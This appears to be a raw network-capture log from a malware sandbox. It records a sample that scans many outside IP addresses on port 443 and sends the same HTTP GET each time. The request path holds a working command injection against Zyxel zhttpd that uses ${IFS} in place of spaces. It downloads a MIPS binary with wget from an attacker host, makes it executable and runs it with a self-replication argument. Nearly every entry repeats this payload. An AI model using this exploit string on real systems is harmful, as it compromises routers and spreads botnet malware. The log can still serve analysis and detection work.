                                                  Jan 19, 2024 18:23:46.870318890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2284192.168.2.1345526217.196.130.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870361090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2285192.168.2.135048018.168.224.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870384932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2286192.168.2.135905671.75.239.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870440960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2287192.168.2.1343682156.132.113.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870471954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2288192.168.2.1358072145.68.106.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870511055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2289192.168.2.1356600123.191.228.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870547056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2290192.168.2.1348906146.191.8.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870580912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2291192.168.2.1343472198.46.152.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870611906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2292192.168.2.134307232.194.50.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870661020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2293192.168.2.1350162104.180.53.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870701075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2294192.168.2.1333378134.201.149.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870753050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2295192.168.2.1354720185.86.150.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870790005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2296192.168.2.1343368208.156.68.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870832920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2297192.168.2.1353342168.218.95.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870882988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2298192.168.2.1351186184.115.118.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870923996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2299192.168.2.1334508208.210.249.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870973110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2300192.168.2.1339402221.167.10.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871011972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2301192.168.2.133936223.11.163.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871042967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2302192.168.2.1342426163.196.14.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871072054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2303192.168.2.135445499.239.110.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871103048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2304192.168.2.1335778110.163.178.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871151924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2305192.168.2.1358538159.181.205.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871186018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2306192.168.2.1353910161.50.199.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871260881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2307192.168.2.1355584177.172.69.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871285915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2308192.168.2.1343010210.222.57.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871325016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2309192.168.2.1347936166.91.96.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871361017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2310192.168.2.134177088.183.96.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871400118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2311192.168.2.134255686.224.52.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871429920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2312192.168.2.1342352143.57.8.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871462107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2313192.168.2.134941484.50.227.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871511936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2314192.168.2.133578879.139.170.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871563911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2315192.168.2.1342620140.90.118.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871597052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2316192.168.2.134297242.17.186.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871629953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2317192.168.2.13355269.189.229.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871681929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2318192.168.2.135737651.247.202.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871731043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2319192.168.2.1341578222.120.11.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871777058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2320192.168.2.1351318113.161.19.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871809006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2321192.168.2.1357372210.140.90.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871838093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2322192.168.2.1343218132.98.120.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871879101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2323192.168.2.133397014.87.193.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871908903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2324192.168.2.135653624.187.83.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871974945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2325192.168.2.1334632223.126.129.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.871995926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2326192.168.2.1356896211.138.63.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872056961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2327192.168.2.1346452136.19.186.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872103930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2328192.168.2.135759897.201.212.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872138023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2329192.168.2.1346148190.134.46.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872175932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2330192.168.2.1354364218.169.164.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872221947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2331192.168.2.1357164195.95.188.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872272015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2332192.168.2.134296874.109.104.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872314930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2333192.168.2.1358778204.75.37.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872379065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2334192.168.2.1339092160.158.71.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872384071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2335192.168.2.133417679.177.247.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872440100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2336192.168.2.1340280100.35.174.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872466087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2337192.168.2.1352234209.228.76.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872503996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2338192.168.2.135765874.182.114.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872520924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2339192.168.2.134652670.110.66.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872580051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2340192.168.2.1336764219.86.172.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872622967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2341192.168.2.1338830201.173.113.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872670889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2342192.168.2.1355126205.176.179.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872709990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2343192.168.2.1336214155.238.3.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872740030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2344192.168.2.1354276210.7.247.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872770071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2345192.168.2.1337446102.176.97.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872818947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2346192.168.2.1336812103.47.141.167443
                                                  TimestampBytes transferredDirectionData
